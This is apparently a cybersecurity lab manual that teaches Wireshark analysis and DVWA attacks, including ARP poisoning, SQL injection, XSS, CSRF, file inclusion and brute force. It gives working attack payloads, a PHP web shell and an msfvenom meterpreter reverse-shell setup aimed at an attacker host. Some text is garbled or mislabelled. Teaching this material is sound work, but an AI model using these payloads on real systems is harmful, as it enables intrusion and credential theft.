Module 1: Packet Analysis using Wire shark

Experiment-1
=====================================================================================
Basic Packet Inspection: Capture network traffic using Wire shark and analyze basic protocols like HTTP, DNS,
and SMTP to understand how data is transmitted and received.

1. Aim: Study of packet sniffer tools like wireshark.

2. Objectives: To observe the performance in promiscuous & non-promiscuous mode & to find the packets based
on different filters.
• To understand the flow of network packets through the TCP/IP Stack
• Understand the TCP three-way handshake protocol
• To practice capturing FTP packet flow
• To analyze the FTP packet flow
• To learn how to use a network traffic capture and analysis tool, like Wireshark™
Packet Capturing (Packet Sniffing): A packet sniffer is an application which can capture and analyze network
traffic which is passing through a system’s Network Interface Card (NIC). The sniffer sets the card to promiscuous
mode, which means all traffic is read, whether it is addressed to that machine or not. The figure below shows an
attacker sniffing packets from the network, and the Wireshark packet sniffer/analyzer (formerly known as ethereal).

3. Outcomes: The learner will be able to:-

➢ Identify different packets moving in/out of network using packet sniffer for network analysis.
➢ Understand professional, ethical, legal, security and social issues and responsibilities. Also will be able to
analyze the local and global impact of computing on individuals, organizations, and society.
➢ Match the industry requirements in the domains of Database management, Programming and Networking
with the required management skills.
4. Hardware / Software Required: Wireshark, Ethereal and tcpdump.

5. Theory: Wireshark, a network analysis tool formerly known as Ethereal, captures packets in real time and display
them in human-readable format. Wireshark includes filters, color-coding and other features that let you dig deep into
network traffic and inspect individual packets.

[Link]:
➢ Network administrators use it to troubleshoot network problems
➢ Network security engineers use it to examine security problems
➢ Developers use it to debug protocol implementations
➢ People use it to learn network protocol internals beside these examples can be helpful in many other
situations too.

5.2. Features:The following are some of the many features wireshark provides:
➢ Available for UNIX and Windows.
➢ Capture live packet data from a network interface.
➢ Open files containing packet data captured with tcpdump/WinDump, Wireshark, and a number of other
packet capture programs.
➢ Import packets from text files containing hex dumps of packet data.
➢ Display packets with very detailed protocol information.
➢ Export some or all packets in a number of capture file formats.
➢ Filter packets on many criteria.
➢ Search for packets on many criteria.
➢ Colorize packet display based on filters.
➢ Create various statistics.
 Introduction to Wireshark: Wireshark is a network packet analyzer. A network packet analyzer presents captured packet
data in as much detail as possible. You could think of a network packet analyzer as a measuring device for examining what’s
happening inside a network cable, just like an electrician uses a voltmeter for examining what’s happening inside an electric
cable (but at a higher level, of course) Downloading.

Steps: 1. Your first step is to head to the Wireshark download page and locate the Windows installer.
2. You will be presented with the Wireshark wizard to guide you through the installation. Click “Next.”
[Link], you can review, agree to the license agreement, and click “Noted” to continue.

Once your file is downloaded, you can open the file from your Download folder.

4. The next screen will ask if you want to donate to the Wireshark Foundation to help support Wireshark and
Sharkfest at [Link] Click “Next” when finished.
5. Next, you will be asked what components you want to install. You can make your choice and then click“Next.”
6. The following screen will ask if you want to create any shortcuts and if you want to associate trace file
extensions with Wireshark (recommended).
 7. Now you must install Ncap (an open-source library for packet capture and network analysis). It’s a library
allowing Wireshark to capture and analyze network traffic effectively. It enhances Wireshark's capabilities
by providing optimized packet capture.
8. Wireshark will now begin the installation process.

Objective 1: Basic Packet Inspection: Capture network traffic using Wire shark and analyze basic protocols like
HTTP, DNS, and SMTP to understand how data is transmitted and received.

Tool Used: Wireshark Protocols used in different OSI Layers:

SENDER/BROWSER RECEIVER/SERVER

Commands used for making Reference Table:

• Ipconfig /all (for getting information of local host)
• arp -a (for getting MAC address of Gateway)
• ping [Link] for capturing http packets
1. Steps to Analyse HTTP protocol
Step 1: Open ether/wifi adapter in wireshark
Step2: Apply http filter as given below:
Step 3: Start Capturing
Step 4: open [Link] in the browser Step
5: Analyse the TCP data (source port, destination port), source Mac, Destination Mac, Source Ip etc. and
compare it with the reference table
Step 6: check 3way handshaking befor establishing http connection by using the filter [Link]==56368*
 Step 7: Now finally record the data for http header in the table given ABOVE.
[Link] to analyse DNS protocol
 DNS:

Command for cmd:

ipconfig /displaydns
ipconfig /flushdns

DNS observation Step:

1: Start capturing via Wireshark Step
2: ping [Link] (command prompt) Step
3: Apply dns protocol filter in wireshark Step
4: Observe the data in the given table:

Step to analyse SMTP protocol

Step 1: Start capturing via Wireshark
Step 2: Enable the telnet feature by usin windows feature service
Step 3: telnet [Link] 25 (command prompt)
Helo sahil
Commands to use:

Step 3: Apply smtp protocol filter in wireshark

Step 4: Observe the data in SMTP:

Note: Wireshark is an extremely powerful tool, and this tutorial is just scratching the surface of what you can do with
it. Professionals use it to debug network protocol implementations, examine security problems and inspect network
protocol internals.

Conclusion: In this experiment we analyze various packet sniffing tools that monitor network traffic transmitted
between legitimate users or in the network. The packet sniffer is network monitoring tool. It is opted for network
monitoring, traffic analysis, troubleshooting, Packet grapping, message, protocol analysis, penetration testing and
many other purposes.

RESULT: This experiment successfully executed using wireshark.

 Experiment-2

=============================================================================================

Objective: Detecting Suspicious Activity: Analyze network tra8ic to identify suspicious patterns, such as repeated
connection attempts or unusual communication between hosts.

Tool and Package Required:

Sec-sick [Link]
[Link] Arp_poison.pcap

Step 1:
Check the normal activity of di8erent protocol on the network by checking protocol hierarchy and find the
normal information being transferred under di8erent protocols susch as TCP and UDP.

Protocol heirarchy:

Step 2: Open [Link] and observer the suspicious data being transferred in TCP protocol and observe
the path of the same.

Sec sick client:

Step 3: Load the other package “[Link]”- Spear Phishing attack and observe the line no 6 forframe attack

Line 6 I frame attack:

Step 4: Observe line 21 as some gif data is being transferred with unreadable language.

Line 21 :
 Step 5: Check the TCP data by following TCP stream of the same and observe that the hacker istrying to access the
adming control by getting password and other credentials.

Line 25- TCP stream:

Step 6: Observe the suspicious activity by loading the package “ arp_poison.pcap” and check that there is man in
the middle attack is being happened in line no. 54, 55,56 and 57.

RESULT: This experiment successfully executed using wireshark.

 Experiment No.:3

Objective: Malware Traffic Analysis: Analyze captured traffic to identify signs of malware communication, such as
command-and-control traffic or data infiltration.

Package: [Link]
What are we looking for:
1. What are the infected file(s) downloaded and their hashes?
2. What is URL/ Domain of the infected site?
3. What is the IP address of the infected website?
4. What is the IP address of the infected machine ?
5. What is the hostname of the infected machine?
6. What is the mac address of the infected machine ?

To see only Get and Post Request : Filter ---[Link]

To get the better understanding of destination: Right Click on host user HTTP:

Now check Host Column:

Sort column by Content type:

We can save all suspicious files:

We can directly upload the files to virus total but we avoid due to confidentiality, instead we find
the hash of file and then check for malicious activity.
Now, we checked the hash in virus total and found it infected.
 2. What is URL/ Domain of the infected site?
Answer: see the host name of infected file.
[Link]

3. What is the IP address of the infected website?

[Link]

4. What is the IP address of the infected machine ?

[Link]
5. What is the hostname of the infected machine?
K34EN6W3N-PC
6. What is the mac address of the infected machine ?
[Link]

Host name using DHCP:

RESULT: This experiment successfully executed using wireshark.

 1

EXPERIMENT 4
Objective 1: Simulate a scenario where a password is transmitted in plaintext. Use wire shark to capture and
analyze the packets to demonstrate the vulnerability and the importance of encryption.

Tool Used: Wireshark

Password Capturing/Sniffing
Wireshark can capture not only passwords but any type of information transmitted over the network:
usernames, email addresses, personal information, etc. As long as we can capture network traffic, Wireshark
can sniff passing passwords.
In sniffing can include passwords for various protocols such as HTTP, FTP, Telnet, etc. the captured data
can be used to troubleshoot network problems, but can also be used maliciously to gain unauthorized access
to sensitive information.
So, here we will see how we can capture the password using the Wireshark network capture analyzer. and
see the outputs of the following steps.
Step 1: First of all, open your Wireshark tool in your window or in Linux virtual machine. and start
capturing the network. suppose I am capturing my wireless fidelity.

Step 2: After starting the packet capturing we will go to the website and login the credential on that website
as you can see in the image.
 2

Step 3: Now after completing the login credential we will go and capture the password in Wireshark. for that
we have to use some filter that helps to find the login credential through the packet capturing.

Step 4: Wireshark has captured some packets but we specifically looking for HTTP packets. so in the
display filter bar we use some command to find all the captured HTTP packets. as you can see in the below
image the green bar where we apply the filter.

http
 3

Step 5: So there are some HTTP packets are captured but we specifically looking for form data that the user
submitted to the website. for that, we have a separate filter
As we know that there are main two methods used for submitting form data from web pages like login forms
to the server. the methods are-
 GET
 POST
Step 6: So firstly for knowing the credential we use the first method and apply the filter for the GET
methods as you can see below.
[Link] == "GET"

GET method
As you can see in the image there are two packets where the login page was requested with a GET request as
well, but there is no form data submitted with a GET request.

Step 7: Now after checking the GET method if we didn’t find the form data, then we will try the POST
method for that we will apply the filter on Wireshark as you can see.

[Link] == "POST"
 4

As you can see we have a packet with form data click on the packet with user info and the application URL
encoded. and click on the down-
HTML form URL Encoded where the login credential is found. login credential as it is the same that we
filed on the website in step 2.
Form item: "uname" = "Tonystark_44"
Form item: "pass" = "tony@1234"
 Experiment 5

Objective: ARP Poisoning Attack: Set up an ARP poisoning attack using tools like Ettercap. Analyze
the captured packets to understand how the attack can lead to a Man-in-the-Middle scenario.

Install Virtual Box Manager on Windows

Install Kali Linux through Virtual Box

Choose Installer Image

Start Kali Linux:
Open Terminal and write command: ip add

Copy MAC address from above and run command in wireshark @kali

We observe: No traffic is being captured

Aim is to capture the traffic between Target and default gate way on same line.

So we go to Target Device (Windows) and find IP address and default gateway.

IPv4 Address. . . . . . . . . . . : [Link]

Default Gateway . . . . . . . . . : [Link]

We are going to sniff traffic once we enable ARP poising using Tool Ettercap

OR

Click on three dots and scan for hosts

Select Ip Address and Add to Target 1
Select Default Gateway and Add to Target 2

Still Nothing is capturing

Select Current Targets

Click ARP Poisoning and start sniffing

Now we can see, packets are being captured

Open Wireshark on target Machine and check ARP Poisoning

 Experiment No.: 6

AIM: SQL Injection: Use DVWA to practice SQL injection attacks. Demonstrate how an attacker can
manipulate input fields to extract, modify, or delete database information.

6.1 SQL injection (SQLi)

SQL injection is one of the most common attacks used by hackers to exploit any SQL database-driven web
application. It’s a technique where SQL code/statements are inserted in the execution field with an aim of either
altering the database contents, dumping useful database contents to the hacker, cause repudiation issues, spoof
identity, and much mor

6.2 How to prevent SQL injection

The main reason that makes websites vulnerable to SQL injection attacks can be traced back to the web
development stage. Some of the techniques that can be implemented to prevent SQL injection include:

 Input validation: If the website allows user input, this input should be verified whether it’s allowed or not.
 Parametrized queries: This is a technique where the SQL statements are precompiled and all you have to
do is supply the parameters for the SQL statement to be executed.
 Use Stored procedures
 Use character-escaping functions
 Avoid administrative privileges - Don't connect your application to the database using an account with
root access
 Implement a Web application firewall (WAF)
Any penetration tester who wants to get started or advance their skills in SQL injection will need a vulnerable
platform to practice. There are many vulnerable applications available both for offline and online use.

In this, We will focus on the Damn Vulnerable Web Application (DVWA).

6.3 Pre-requisites: This tutorial expects that you have an up and running DVWA set up. If you have not yet
installed DVWA on your Kali Linux system, please check out the article on the link
[Link] which gives a step-by-step guide.

Step 1: Setup DVWA for SQL Injection

After successfully installing DVWA, open your browser and enter the required
URL [Link]/dvwa/[Link] Log in using the username “admin” and password as “password”. These are the
default DVWA login credentials. After a successful login, set the DVWA security to LOW then click on SQL
Injection on the left-side menu.
Step 2: Basic Injection

On the User ID field, enter “1” and click Submit. That is supposed to print the ID, First_name, and Surname on the
screen as you can see below.

The SQL syntax being exploited here is:

sql
$getid=“SELECT first_name, last_name FROM users WHERE user_id = ‘$id’”;

DVWA Basic SQL Injection: Interestingly, when you check the URL, you will see there is an injectable
parameter which is the ID. Currently, my URL looks like this:
bash
[Link]

Let’s change the ID parameter of the URL to a number like 1,2,3,4 etc. That will also return
the First_name and Surname of all users as follows:

bash
ID: 2
First name: Gordon
Surname: Brown

ID: 3
First name: Hack
Surname: Me

ID: 4
First name: Pablo
Surname: Picasso

If you were executing this command directly on the DVWA database, the query for User ID 3 would look like this:

sql

SELECTfirst_name, last_nameFROM users WHEREuser_id = ‘3’;

SQL Injection
Step 3: Always True Scenario

An advanced method to extract all the First_names and Surnames from the database would be to use the input: %’
or ‘1’=’1’

The percentage % sign does not equal anything and will be false. The ‘1’=’1’ query is registered as True since 1
will always equal 1. If you were executing that on a database, the query would look like this:

sql
SELECTfirst_name, last_nameFROM users WHEREuser_id = ‘%’or‘1’=’1’;

Step 4: Display Database Version

To know the database version the DVWA application is running on, enter the text below in the User ID field.

Bash
%’ or 0=0 union select null, version() #

The database version will be listed under surname in the last line as shown in the image below.

Display database version

Step 5: Display Database User: To display the Database user who executed the PHP code powering the database,
enter the text below in the USER ID field.
Bash
%’ or 0=0 union select null, user() #
The Database user is listed next to the surname field in the last line as in the image below.
 Display database user

Step 6: Display Database Name

To display the database name, we will inject the SQL code below in the User ID field.

Bash
%’ or 0=0 union select null, user() #

The database name is listed next to the surname field in the last line.
 Display database name

Step 7: Display all tables in information schema

The Information Schema stores information about tables, columns, and all the other databases maintained by
MySQL. To display all the tables present in the information_schema, use the text below.

Bash
%’ and 1=0 union select null, table_name from information_schema.tables #
 Database schema

Step 8: Display all the user tables in information_schema

For this step, we will print all the tables that start with the prefix user as stored in the information_schema. Enter
the SQL code below in the User ID.

%’ and 1=0 union select null, table_name from information_schema.tables where table_name like ‘user%’#
 User tables

Step 9: Display all the columns fields in the information_schema user table

We will print all the columns present in the users’ table. This information will include column information like
User_ID, first_name, last_name, user, and password. Enter the input in the User_ID field.

%’ and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where

table_name = ‘users’ #
 Column fields

Step 10: Display Column field contents: To display all the necessary authentication information present in the
columns as stored in the information_schema, use the SQL syntax below:

%' and 1=0 union select null,

concat(first_name,0x0a,last_na

me,

0x0a,user,0x0a,password) from users #

Column fields contents

From the image above, you can see the password was returned in its hashed format. To extract the password,
copy the MD5 hash and use applications like John the Ripper to crack it. There are also sites available on the
internet where you can paste the hash and sometimes, you will be able to extract the password.

Conclusion: From the various examples listed in this article, SQL injection proves to be a critical vulnerability
that can exist in a system. Not only can attackers exploit it to reveal user or customer information, but it can also
be used to corrupt the entire database thus bringing the whole system down. As of writing this post (2021),
Injection is listed as the number one vulnerability in the OWASP Top 10 Vulnerabilities summary. The DVWA
acts as a reliable resource for both penetration testers who want to improve their skills and web developers who
want to develop systems with security in mind.

RESULT: This experiment successfully executed using wireshark.

 Experiment No.: 7

AIM: Cross-Site Scripting (XSS): Exploit XSS vulnerabilities in DVWA to inject malicious scripts into
web pages. Show the potential impact of XSS attacks, such as stealing cookies or defacing websites.

7.1 Introduction: XSS is a technique in which attackers inject malicious scripts into a target website and may
allow them to gain access control of the website. If a website allows users to input data like comment, username
field and email address field without controls then attacker can insert malicious code script as well.
7.2 TYPES OF XSS:
 Reflected XSS
 Stored XSS
 Dom Base XSS
Let’s try cross site scripting virtual environment

7.3 Requirements:
 Xampp or wamp
 DVWA (Damn vulnerable web application)
 Browser like Firefox, explorer, Cyberfox, Chrome e.t.c

7.4 Reflected XSS(cross site scripting):RXSS

In this case, hacker data is not stored on the website. reflected XSS only execute on the victim side. reflected
cross-site scripting A hacker sends input script that website then reflected back to the victim’s browser, where
hacker it executed the malicious JavaScript payloads.

DVWA low level Reflected XSS:

Payload: <script>alert(“xss”)</script>

DVWA Medium Level Reflected XSS

Payload : <Script>alert(“hack by falcon”)</Script>
DVWA High Level Reflected XSS
Payload: <imgsrc=x onerror=alert(“falcon”)>

7.5 Stored XSS (Cross site scripting):SXSS: Stored cross-site scripting (XSS) In this case the hacker malicious
code is stored target website and the web server. when an attacker can send malicious JavaScript into the website
and that script is executed other users’ computers that is stored (XSS) cross-site scripting.

DVWA Low Level Stored XSS:

Payload: <script>alert([Link])</script>
DVWA Medium Level Stored XSS
Payload : <imgsrc=x onerror=alert([Link])>

DVWA High Level Stored XSS

Payload : <body onload=alert(“bingo”)>
7.6 DOM BASE XSS:Dom base (XSS) cross-site scripting attack is a short-form document object model based
cross-site scripting. That is, the page itself HTTP response does not change, An attacker may use several DOM
objects to create a Cross-site Scripting attack. The most popular objects from this perspective are [Link],
[Link], and [Link].

DVWA low level DOM XSS:Payload:

localhost/dvwa/vulnerabilities/xss_d/?default=<script>alert(1)</script>

DVWA Medium level DOM BASE:

Payload: localhost/dvwa/vulnerabilities/xss_d/?default=English#<script>alert(1)</script> and reload your
browser.
 DVWA HIGH LEVEL DOM BASE:

Payload: localhost/dvwa/vulnerabilities/xss_d/?default=English#<script>alert([Link])</script>
and reload browser.

RESULT: This experiment successfully executed using wireshark.

 Experiment No.: 8

AIM: Cross-Site Request Forgery (CSRF): Set up a CSRF attack in DVWA to demonstrate how attackers can manipulate
authenticated users into performing unintended actions.

Introduction: CSRF stands for Cross-Site Request Forgery. It is a type of attack that occurs when a malicious web
site, email, or blog causes a user’s web browser to perform an unwanted action on a trusted site for which the user is
currently authenticated. The attack exploits the trust that a site has for a user’s browser and can be used to transfer
funds, change account information, or perform other malicious actions.
As usual, the default credentials are:
 Username: admin
 Password: password

Step 1: CSRF On DVWA With Low-Security Level: As the level implies, this task is extremely easy. Moreover, I
believe it is the best level for comprehending the fundamental concept of CSRF.

By opening the page, we see a form where we can change our password.
The first thing we did is to try change the password and observe the result.
And after doing that we are still on the same page, but looking at the URL bar, there is an interesting value.
For example, if the new password is: “admin” the result will be something like this:
http:/localhost:9999/vulnerabilities/csrf/?password_new=admin&password_conf=admin&Change=Change#

It’s clear that the form accepts a GET HTTP request and sends three parameters named:
 password_new
 password_conf
 Change
So we can imagine an attacker that will send you a malicious address like:
[Link]
If he finds a way to let you click when you are still authenticated, your password will automatically be admin.
Step 2: CSRF On DVWA With Medium-Security Level:

If we try to use low security method then it won’t work anymore.

As we know, we will first view the source code.

The flaw in this code is a Cross-Site Request Forgery (CSRF) vulnerability. The code uses the HTTP
Referer header to check if the request came from the same server, assuming it’s a trusted source. However, the
Referer header can be easily manipulated by an attacker. This allows an attacker to create a malicious website or
craft a URL that makes a request to this script, tricking the user’s browser into performing an unwanted action on
their behalf, such as changing their password without their knowledge or consent.
In the valid request, we observe the presence of a Referer indicating the request’s origin. This alignment
allows the request to proceed successfully. Now, consider intercepting the unauthorized request using Burp
and including the HTTP Referer. This modified approach aims to mimic the legitimate request structure.

Step 3: CSRF On DVWA With High-Security Level:

First lets view the source code.

 On the high-security setting of DVWA, a unique ANTI-CSRF token is created each time the password
change page is accessed. This token serves to authenticate the session and validate the legitimacy of a password
change request, safeguarding against malicious attempts to alter passwords through deceptive pages. The token’s
uniqueness and dynamic generation on every request prevent brute-force attacks, as it ensures that each token is
specific to its session. The code validates that the token in the request matches the one generated for that session,
thereby restricting password change requests to the legitimate DVWA/vulnerabilities/csrf page. Employing an
ANTI-CSRF token proves to be an effective security measure, effectively mitigating CSRF attacks.
We are going to use a file upload vulnerability to send our payload to the server and then we can simply
deliver the malicious link.
Now, we can create an HTML file that I’m going to call “Index.html1”, and it will contain the payload.

The code present in the index.html1 file utilizes an iframe to embed a page and runs a script to extract the
CSRF token from the document. Subsequently, the extracted token is employed to initiate another request for
altering the user’s password, but this time with the correct token acquired from the document elements.
 The process involves loading the DVWA password change page within an iframe, extracting the CSRF
token using JavaScript, and then utilizing this token to create a new request for changing the user’s password. By
doing so, the attacker can circumvent CSRF protection, enabling them to modify the user’s password without the
user’s awareness.
To execute the code server-side, a practical approach is to leverage the file upload feature. This involves
uploading the [Link] file onto the server, facilitating the implementation of the code on the server side.

After uploading the HTML file to the server, the file will be accessible at a specific path.

Now you have your malicious link to send to your victim that has this format:
[Link]:9999/hackable/uploads/index.html1

By redirecting to this path, using localhost:9999, the “click me” option will be displayed.

The exploit is done!

After clicking this option, the user’s password will be successfully changed. This sequence exemplifies how
an attacker can exploit a CSRF vulnerability to execute a malicious payload, surreptitiously modifying a user’s
password without their knowledge or consent.
The password is changed successfully!

RESULT: This experiment successfully executed using wireshark.

 Experiment No.: 9

AIM: File Inclusion Vulnerabilities: Explore remote and local file inclusion vulnerabilities in DVWA. Show how attackers can
include malicious files on a server and execute arbitrary code.

Definition of File Inclusion Vulnerability:

File inclusion vulnerability is a security flaw that allows an attacker to access/execute arbitrary files on a
target system. We can often find this type of vulnerability in web applications that dynamically include files based
on user input. The lack of appropriate checks could allow the attacker to gain unauthorized access to sensitive data.
File inclusion vulnerabilities can be difficult to detect and protect against, making them a common target for
hackers.

How Does File Inclusion Work?

Now that we have seen the definition, let’s go a bit deeper and see how it works.

File inclusion works by allowing an application to dynamically include and execute files based on user input. But
just to stress more the concept, try to imagine this example:
We consider a hypothetical application that:
 allows users to upload their own profile pictures

 generates a link to the uploaded picture and displays it on the user’s profile page.
However, if the application does not properly validate the file type or the location of the file, an attacker could:
 exploit this by uploading a malicious file and tricking the application into executing it.
 get unauthorized access to some sensitive data
What Types Of File Inclusion Vulnerability Exist?
There are two main types of file inclusion vulnerabilities: local file inclusion (LFI) and remote file inclusion (RFI).

1. Local file inclusion (LFI) vulnerabilities occur when an attacker can manipulate an application to include and
execute files from the local file system. We can find this particular vulnerability in web applications that don’t
check for user input and load dynamically some files.
It can be extremely dangerous when the target application has also an Unrestricted File Upload vulnerability as
we have seen in the related article.
The combination of these two vulnerabilities can let an attacker do whatever he wants. In other cases, the
vulnerability can be still dangerous but it can have some limits.
2. Remote file inclusion (RFI) vulnerabilities occur when an attacker can manipulate an application to include
and execute files from a remote location. We can find this vulnerability in applications that dynamically include
files from external sources, based on user input. Such as a website that displays user-generated content. An
attacker can exploit this type of vulnerability by tricking the application into including and executing a
malicious file from a remote server under his [Link] other words:
 LFI allows the inclusion of files in the local file system
 With RFI the file can be on a remote server.

Directory Path Traversal Vs File Inclusion

The difference between directory path traversal and file inclusion is not so clear so, in this introduction, I
want to go a bit deeper! By looking at the web, I noticed that those two vulnerabilities cause a bit of confusion, so
I’ll try to explain them at my best! Path traversal and file inclusion are similar in that they both involve
manipulating the file system of a target system. However, they differ in the specific ways that they are exploited
and the types of vulnerabilities that they target.

 Path traversal, also known as directory traversal, is a type of vulnerability that allows an attacker to access
files and directories that are outside of the intended directory structure. The attacker in this case
manipulates the file path of a request to access files or directories that should not be visible. For example,
an attacker could exploit a path traversal vulnerability by accessing the root directory of a server and

  viewing sensitive files that are not normally accessible to them.
 File inclusion, on the other hand, involves manipulating an application to include and execute files from
the file system.

Overall, while both path traversal and file inclusion involve manipulating the file system of a target system, they
target different types of vulnerabilities and their exploitation is pretty different.
Summing up, Directory Path Traversal vulnerabilities allow an attacker to access files and directories that are
outside of the intended directory structure, while File Inclusion vulnerabilities allow an attacker to include and
execute arbitrary files on a target system.
So the main difference is that File Inclusion, as the name says, includes a file and then executes it.

Example Of LFI
Even if it’s just an introduction to file inclusion vulnerability, I want to show you a practical example of LFI.
Obviously, I’ll try to keep the technical part as little as possible.

First of all, to exploit this vulnerability we want our malicious payload inside the target server. So in order to
simulate a real case, I want to couple this vulnerability with the already seen “Unrestricted File Upload“
Here is an example of an application that has these vulnerabilities:
  Local File Inclusion
 Unrestricted File Upload
If you want to run it on your machine, you should have an HTTP server which supports PHP (XAMPP can be a
valid alternative). In this tutorial, I assume you are working on your Kali Machine, so you just need to install PHP
by typing this in your terminal and then use the built-in server:
sudo apt install php libapache2-mod-php
Now you can create a file called “[Link]” and write this code inside:

[Link]

<?php
// include the file passed as GET parameter
if (isset($_GET['file'])) {
include($_GET['file']);
}

// upload the file

if (isset($_FILES['file'])) {
move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $_FILES['file']['name']);
}

?>

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
<link rel="stylesheet" href="[Link]
integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T"
crossorigin="anonymous">
</head>
<body>
<div class="container">
<div class="row">

<div class="col-md-6">
<form action="" method="POST" enctype="multipart/form-data">

<div class="form-group">
<label for="file">Upload file</label>
<input type="file" class="form-control" name="file" id="file">
</div>
<button type="submit" class="btn btn-primary">Submit</button>
</form>
</div>
</div>
</div>
</body>
</html>
This is a PHP script that:

 Handles file uploads

 Includes a file if a GET parameter named file is set
 Checks if the file parameter is set in the $_GET superglobal array
 If it is, the script will include the file specified by the parameter.
 Next, the script checks if a file has been uploaded via a POST request by checking if the file element is set
in the $_FILES superglobal array
 If a file has been uploaded, the script will move the uploaded file to the uploads/ directory and give it the
original name of the uploaded file.
 The script then outputs an HTML document with a file upload form.
The form uses the POST method and has the enctype attribute set to "multipart/form-data" to allow file uploads. On
form submission, the server executes the file we sent.
It’s easy, but before proceeding let’s create a directory called “uploads” by typing on the terminal:

mkdir uploads
Now we can execute our simple PHP server with the command:

php -S [Link]:8000 -t .
Finally, this is the result in our browser by typing [Link]

Now you can look for a backdoor or maybe create it by yourself, I’m going to use the one at this address, and this is
the code:

<?php

if(isset($_REQUEST['cmd'])){e
cho "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}

?>
So let’s upload it with the form, and after that, it’s inside the “uploads” folder, so we can execute cat or whatever
we want by typing an URL like this:

[Link]
In this case, it will prompt the content of /etc/passwd.
It would be pretty easy to understand how to take advantage of that to take down the system totally.

Example Of RFI
Here is an example of an application that has a remote file inclusion vulnerability:

[Link]

<?php
// include the file at the URL passed as GET parameter
$url = $_GET['url'];
include($url);
?>

This is similar to what we have already seen, however, in this case, the backdoor is inside a remote server.

Before keep hacking, we need to allow the remote file upload that is turned off by default, so let’s stop the server
and create a file called “[Link]”.

allow_url_include=1
Now we can run again with the new configuration:

php -S [Link]:8000 -t . -c [Link]

In this step, I want to show you something funnier, so let’s open an attacker machine (it can also be the same, even
if it would be more realistic with two machines).

Let’s imagine having those two machines, and jumping into the attacker one, after that you can create your payload
with msfvenom in this way:

msfvenom -p php/meterpreter_reverse_tcp LHOST=[Link] LPORT=4567 -f raw > [Link]

Remember that the value inside LHOST has to be the IP of the attacker’s machine.

In the end, we have a backdoor called “[Link]”, now we need to host it, and we can do it with a simple Python
HTTP server by typing in our terminal:

python -m [Link]
And if everything is ok, you should see your server running.

At this point, still, from the attacker’s machine, you have to:

 Run a listener from the terminal with the commands:

 use exploit/multi/handler
set LHOST <ATTACKER_IP>
set LPORT <CHOSEN_PORT>
set PAYLOAD php/meterpreter/reverse_tcp
exploit
This is the example in my machine:

 Open your browser and connect to the vulnerable app with this address
[Link]
In my case, I’m going to connect to:

[Link]
And we did everything! Now in your attacker machine, you have a working “meterpreter” session and you can get control of
the target!

How Can You Prevent File Inclusion Vulnerability?

There are several possible mitigations for file inclusion vulnerabilities, including the following:

1. Proper input validation. One of the most effective ways to prevent file inclusion vulnerabilities is to validate all user-
provided input. This technique ensures that the file does not contain any malicious code. This can be done by:
 using strict input filtering
 sanitizing user-provided data
 only allowing certain file types to be uploaded.
2. Use of a whitelist. Another way to prevent file inclusion vulnerabilities is to use a whitelist and only allow access to files
and directories on that list. This can prevent attackers from accessing sensitive files or directories that are outside of the
intended directory structure.
3. Use of a blacklist. It’s the opposite approach with respect to the whitelist, it’s probably less effective and prone to errors.
It consists in denying access to several predefined structures in the blacklist.
4. Regular security updates. In case you are a webmaster or system administrator keeping your system and applications up
to date with the latest security patches is crucial for preventing file inclusion vulnerabilities. Regularly applying security
updates can help to fix known vulnerabilities and prevent attackers from exploiting them.
5. Security training and awareness. Educating developers about the risks of file inclusion vulnerabilities and how to
prevent them is an important part of protecting against these types of attacks. Providing regular security training and
awareness programs can help employees to understand the risks and take steps to prevent file inclusion vulnerabilities in
their own work.
Conclusion: In conclusion, file inclusion vulnerabilities are a serious threat to the security of web applications. These
vulnerabilities allow attackers to include and execute arbitrary files on a target system, potentially gaining unauthorized access
to sensitive data or compromising the system in other ways. As we have seen in the examples above, file inclusion
vulnerabilities can be difficult to detect and protect against, making them a common target for hackers. Therefore, it is
essential for organizations to take steps to secure their systems against file inclusion vulnerabilities and regularly monitor for
potential attacks. By doing so, they can safeguard their systems and prevent costly and damaging breaches.

RESULT: This experiment successfully executed using wireshark.

 Experiment No.: 10

AIM: Brute-Force and Dictionary Attacks: Use DVWA to simulate login pages and demonstrate brute-force and dictionary
attacks against weak passwords. Emphasize the importance of strong password policies.

What is a Brute-Force Attack?

A quite explanatory definition could be:

A brute force attack is a type of cyber attack where a hacker uses an automated tool to guess the
password of a user or system.
Hackers usually perform this attack when they do not have any prior knowledge of the password or the
system and are trying to gain access to a system or account.
A brute force attack can be a very time-consuming and tedious process, especially if the password is long,
complex and generally easy to spot, so it represents the last resort in a real-world attack (in the case of
cautious users).
However, with the help of a powerful computer and the right software, a hacker can make thousands of
guesses per second.
A brute force attack can be of two types:
1. Testing all the possible combinations of allowed characters (rarely used and hard to get
success with relatively long passwords)
2. Testing the password from a list (it works well with weak passwords).
The Best Tools For Bruteforcing
At this point, you should know our approach to the problems, and due to our willingness to learn, using
just a tool without deep knowledge is not the way to go.
However, in the real world, they can save us a lot of time, so before writing our Python script and
performing brute-force attacks on our DVWA machine, I just want to list the best tools with a short
description.
(I’m going to limit the list to tools for Web Application Brute-Force attacks)
 Callow: It is a very easy-to-use Python script that allows you to launch the attack from the
command line, by inserting the selectors as inputs. If you want to test it, you can find a detailed
guide here.
 BurpSuite: It’s widely used in penetration testing, and it has a lot of features one of which (the
intruder) allows us to launch a brute force attack.
 Hydra: The fastest and most complete tool for brute force, it also has a GUI. Its knowledge is
essential for a penetration tester.
How To Protect Yourself
In this case, there is no real vulnerability in the system, so the best way to protect is to make the number
of needed trials so big that cannot be done in a reasonable time and maybe block suspicious activities.
There are many ways to protect against brute force attacks, but here are some of the most effective:
1. Use strong passwords and never reuse them.
2. Use a password manager to generate and store strong passwords.
3. Enable two-factor authentication whenever possible.
4. As a webmaster, you can interfere with the attack by introducing a delay between two trials
All these measures can make the attack so complex that it may require several thousands of years (or
more, depending on the password complexity) to test all the possible combinations, making the system
virtually secure from this attack.

DVWA stands for “Damn Vulnerable Web Application.” It is intentionally designed as a

vulnerable web application to help practice web security skills legally and ethically. It includes
vulnerabilities such as SQL injection, cross-site scripting(XSS), command injection, brute force, etc.

To log into DVWA default username and password are admin and password.

In this walkthrough, we will brute force and gain a username and password.
